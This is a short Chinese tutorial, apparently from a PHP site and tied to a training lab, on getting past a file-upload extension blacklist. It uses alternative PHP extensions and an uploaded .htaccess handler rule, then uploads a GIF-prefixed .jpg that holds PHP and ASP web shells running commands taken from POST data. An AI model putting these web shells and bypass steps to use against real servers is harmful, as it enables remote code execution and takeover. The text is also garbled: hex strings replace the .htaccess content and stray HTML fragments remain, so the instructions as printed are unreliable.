文件上傳繞過黑名單的方法

這篇文章主要介紹了關於文件上傳繞過黑名單的方法，有著一定的參考價值，現在分享給大家，有需要的朋友可以參考一下

　本關主要透過設定上傳後綴，限制asp，php，jsp 等後綴，不允許上傳。

　姿勢一：本次繞過方式為修改後綴為.php3,php5等，這裡是黑名單驗證('.asp','.aspx','.php','.jsp') ，我們可上傳php3,php5...等這樣可以被伺服器解析的後綴名稱

#姿勢二：重寫檔案解析規則繞過

# 1.先上傳先上傳一個名為.htaccess文件，內容如下：

7dbec1342203bda950e5c4d4c26c928b

# SetHandler application/x-httpd-php

d4f50085796fcbc8b99545763f01d848

2、上傳1.jpg腳本
內容：

GIF89a
<?php eval($_POST[&#39;joker&#39;]);?>
<%eval request("joker")%>
<?php system($_POST[&#39;cmd&#39;]);?>

##########

<span style='margin: 0px; padding: 0px; color: #ff00ff; line-height: 1.5 !important; font-family: "Courier New" !important; font-size: 12px !important'><br>最后查看结果如下：<br><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""><br></span>

###以上就是本文的全部內容，希望對大家的學習有所幫助，更多相關內容請關注PHP中文網！ ######相關推薦：#########PHP使用Azure Storage Blob上傳檔案###############nginx memcache快取的介紹###### ####

以上是文件上傳繞過黑名單的方法的詳細內容。更多資訊請關注PHP中文網其他相關文章！